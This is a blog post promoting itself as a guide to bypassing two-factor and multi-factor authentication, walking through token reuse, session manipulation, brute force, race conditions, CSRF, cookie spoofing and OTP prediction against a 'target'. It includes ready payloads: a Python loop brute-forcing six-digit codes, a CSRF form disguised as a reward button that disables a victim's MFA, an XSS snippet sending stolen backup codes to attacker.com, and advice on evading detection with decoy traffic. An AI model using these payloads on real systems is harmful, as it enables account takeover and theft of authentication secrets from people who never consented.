2FA & MFA Hacks: Bypass OTP Like a Pro in 2025

   March 8, 2025  Leave a Comment on 2FA & MFA Hacks: Bypass OTP Like a Pro in 2025  Posted in Blog 0 Likes 4 Views

Direct Endpoint Access

One of the simplest 2FA exploit steps is hitting the endpoint after 2FA directly — think of it as skipping the bouncer at a club.

Use cURL or Postman to send a request directly to endpoints after login but before MFA completion.

curl -X GET "https://target.com/api/user/dashboard" -H "Authorization: Bearer <access_token>"

If you can access the dashboard without completing MFA, the application is vulnerable.

Token-Based Exploits: Reuse and Abuse MFA Tokens

1) Token Reuse

Use old tokens again if the system doesn’t invalidate them.

  1. Capture a valid MFA token using Burp Suite or a proxy tool.
  2. Log in and complete MFA once while monitoring the request.
  3. Save the token sent to the server (e.g., X-MFA-Token: 123456).
  4. Log out and try logging in again, but instead of entering a new token, replay the old one.
  5. If the system allows it, MFA is bypassed!
curl -X POST "https://target.com/api/verify_mfa" -H "Authorization: Bearer <access_token>" -H "X-MFA-Token: 123456"

2) Unused Tokens

Use tokens that weren’t used yet.

  1. Request multiple MFA codes but do not use them all.
  2. Save an unused token (e.g., if three codes are generated, keep the last one).
  3. Try logging in later using the saved token.
  4. If the system accepts it, MFA is bypassed!
curl -X POST "https://target.com/api/verify_mfa" -H "Authorization: Bearer <access_token>" -H "X-MFA-Token: 789012"

3) Token Exposure

Look for tokens in responses.

  1. Use a proxy (Burp Suite, mitmproxy) to intercept requests.
  2. Look for API responses containing sensitive information.
  3. Find and extract the MFA token.
  4. Use the token to bypass the verification step.

A response from an API may contain:

{
  "status": "success",
  "mfa_token": "654321"
}

An attacker can reuse this token for MFA verification.

JavaScript Exposure Example:

Check for exposed tokens in Developer Tools (F12 → Console):

console.log(window.localStorage.getItem("mfa_token"));

If the MFA token is stored in local storage, an attacker can extract and reuse it.

Account and Session Tricks: Sneaky 2FA Exploit

1) Verification Link

Use email links from account creation to access without 2FA.

  1. Create a new account and capture the verification link sent to your email.
  2. Log out before completing the MFA setup.
  3. Use the verification link in an incognito/private browser session.
  4. Check if the account gets verified and logs in without MFA.

A verification email contains:

https://target.com/verify?token=abcdef123456

If clicking this link logs you in directly without requiring MFA, then MFA enforcement is weak.

2) Session Manipulation

Use your session’s 2FA state to access another account.

  1. Log in to two different accounts in the same browser.
  2. Complete MFA for one account.
  3. Switch to the other account (via cookie or session manipulation).
  4. Check if MFA is skipped when switching accounts.

Example Attack:

  • Open Account A (without MFA completed).
  • Open Account B in another tab and complete MFA.
  • Switch back to Account A and check if you now have access without completing MFA.

3) Password Reset

Reset the password and see if 2FA is bypassed.

  1. Request a password reset for an account that has MFA enabled.
  2. Reset the password using the provided link.
  3. Log in with the new password and check if the system asks for MFA.
  4. If it does not require MFA, then the system is vulnerable.

Example Attack:

A password reset email contains:

https://target.com/reset-password?token=xyz789

After resetting the password, if the attacker logs in and MFA is not required, they have bypassed it.

Advanced MFA Bypass Techniques

1) Trusted Platforms

Hack into linked accounts like Google to bypass 2FA.

Some applications allow users to log in via OAuth (Google, Facebook, Microsoft, etc.) instead of requiring MFA. If an attacker compromises a linked account, they can bypass MFA entirely.

Steps to Exploit:

  1. Find an account that allows login via a trusted platform (e.g., “Sign in with Google”).
  2. Compromise the Google/Facebook/Microsoft account via phishing, leaked credentials, or session hijacking.
  3. Use the compromised account to log in to the target service.
  4. Check if MFA is skipped due to trusted platform authentication.

2) Brute Force

Try codes repeatedly, especially if no rate limits exist.

  1. Identify an MFA field that does not lock out users after multiple failed attempts.
  2. Automate guessing with tools like Burp Intruder, Hydra, or custom scripts.
  3. If the system allows resending codes, request a new code repeatedly to reset limits.
  4. Use slow brute-force attacks (e.g., trying one code per minute to evade detection).

Example Brute Force Script (Python)

import requests
url = "https://target.com/api/verify_mfa"
headers = {"Authorization": "Bearer <access_token>"}
for code in range(100000, 999999):  # 6-digit code brute force
    data = {"mfa_code": str(code)}
    response = requests.post(url, headers=headers, json=data)
    if "success" in response.text:
        print(f"Valid MFA Code: {code}")
        break

3) Race Conditions

Exploit timing issues in the system.

  1. Identify an action that requires MFA (e.g., login or enabling 2FA).
  2. Open two or more requests in parallel (e.g., in Burp Suite’s Turbo Intruder).
  3. Send one request to verify MFA and another to access the system before MFA is fully processed.
  4. If the system fails to enforce MFA correctly, access is granted without full verification.

Example Attack Scenario:

  • One request verifies MFA (/verify_mfa).
  • Another request tries accessing a protected page (/dashboard).
  • If the second request bypasses MFA, the system has a race condition.

4) CSRF/Clickjacking

Trick users into disabling 2FA.

  1. Find the request that disables MFA (e.g., POST /disable_mfa).
  2. Craft a malicious link that submits this request when clicked.
  3. Trick the target user into clicking the link while logged in.
  4. If successful, the target’s MFA is disabled without their consent.

Example CSRF Exploit (HTML Page):

<form action="https://target.com/disable_mfa" method="POST">
  <input type="hidden" name="confirm" value="yes">
  <input type="submit" value="Click to claim your reward!">
</form>

If the user is logged in and clicks the button, their MFA is disabled.

5) Remember Me Exploits

Guess cookies or fake IP addresses.

  1. Analyze the authentication cookies after enabling “Remember Me.”
  2. Check if the cookie contains predictable or unencrypted tokens.
  3. Try reusing the cookie from another device to bypass MFA.
  4. If the system uses IP-based trust, spoof the IP using the X-Forwarded-For header.

Example Exploit (Setting X-Forwarded-For Header in Curl):

curl -X GET "https://target.com/dashboard" -H "Cookie: remember_me=abcdef123456" -H "X-Forwarded-For: 192.168.1.100"

Legacy and Backup Issues

Many systems have legacy components or backup mechanisms that introduce MFA weaknesses. Attackers can exploit older versions, backup codes, and previous sessions to bypass MFA entirely.

1) Older Versions

Check subdomains or APIs for outdated, vulnerable setups.

  1. Find outdated versions by scanning subdomains and API endpoints.
  • Use tools like Subfinder, Amass, or Wayback Machine to locate old versions.
  • Example: legacy.target.comapi.v1.target.com/login.

2. Check if MFA is missing or has known security flaws.

3. Attempt login via the old version to bypass MFA enforcement.

Example Subdomain Scan (Using Subfinder & Nmap):

subfinder -d target.com | tee subdomains.txt
nmap -p 443 --script http-title -iL subdomains.txt

If an older version exists, try logging in without MFA.

2) Backup Codes

Steal or generate backup codes if access controls are weak.

  1. Look for security misconfigurations that expose backup codes:
  • CORS misconfigurations: Check if an attacker-controlled website can read API responses.
  • XSS vulnerabilities: Inject JavaScript to steal codes.
  • Unprotected API endpoints: Check /user/backup_codes or similar.

2. Extract backup codes using one of the found vulnerabilities.

3. Use the stolen codes to authenticate and bypass MFA.

Example XSS Payload to Steal Backup Codes:

fetch("https://target.com/api/backup_codes")
  .then(response => response.text())
  .then(data => fetch("https://attacker.com/steal?codes=" + encodeURIComponent(data)));

If successful, the attacker now has valid MFA bypass codes.

3) Previous Sessions

Use old sessions if not terminated after 2FA setup.

  1. Log in before MFA is enabled.
  2. Save session cookies or authentication tokens.
  3. Ask the user to enable MFA or wait for them to do it.
  4. Reuse the old session to access the account without completing MFA.

Example: Stealing Session Tokens with JavaScript

console.log(document.cookie);

If a valid session cookie exists, the attacker can reuse it to bypass MFA.

Additional Exploits

1) Information Disclosure

Look for sensitive data on 2FA pages.

  1. Visit the 2FA page and inspect the page source or network requests.
  2. Look for email addresses, phone numbers, security questions, or partial OTPs.
  3. Use this leaked data to phish the user, brute-force the OTP, or reset the password.

Example: Finding Leaked Data in Network Requests (Using Burp Suite)

  1. Enable Burp Proxy and navigate to the 2FA page.
  2. Look for server responses containing hints like:
  • Your OTP starts with 123***
  • Your registered email: user@example.com
  • Last four digits of your phone: 5678

3. Use this data to guess OTPs, reset passwords, or craft social engineering attacks.

2) Password Reset Bypassing 2FA

Reset password after 2FA setup and check access.

  1. Initiate a password reset for the target account.
  2. Change the password using the reset link.
  3. Log in with the new password and check if the system prompts for 2FA.
  4. If MFA is not required after the reset, access is granted without it.

Example Attack Workflow:

  1. Attacker requests a password reset for victim@example.com.
  2. If they have access to the victim’s email, reset the password.
  3. Log in using the new password and check if MFA is enforced.
  4. If the system skips MFA, access is fully compromised.

3) Decoy Requests

Send fake requests to hide brute force attempts.

  1. Identify the MFA endpoint used for OTP verification.
  2. Automate attack requests while sending normal traffic (e.g., logins, page views).
  3. If successful, the brute-force attack remains undetected by security mechanisms.

Example Decoy Attack Using Burp Intruder:

  1. Set up an attack in Burp Suite’s Intruder.
  2. Use payload lists that mix:
  • Real login requests (to appear as a normal user).
  • Brute force attempts (to guess the OTP).

3. Monitor responses to detect valid OTPs.

4) OTP Construction Errors

Generate OTPs yourself if based on known data.

  1. Analyze how OTPs are generated (e.g., timestamps, user ID, sequential numbers).
  2. Look for patterns by requesting multiple OTPs in a short period.
  3. Recreate the OTP generation logic to predict future OTPs.

Example: Predicting OTPs Based on Timestamps

  1. If the OTP format is YYYYMMDDHHMM + UserID, an attacker can reconstruct it.
  2. Generate the OTP using a simple Python script:
from datetime import datetime
user_id = "1234"
otp = datetime.now().strftime("%Y%m%d%H%M") + user_id
print(f"Generated OTP: {otp}")

3. If the system does not randomize OTPs, an attacker can generate valid OTPs without interception.

Leave a Reply

Your email address will not be published. Required fields are marked *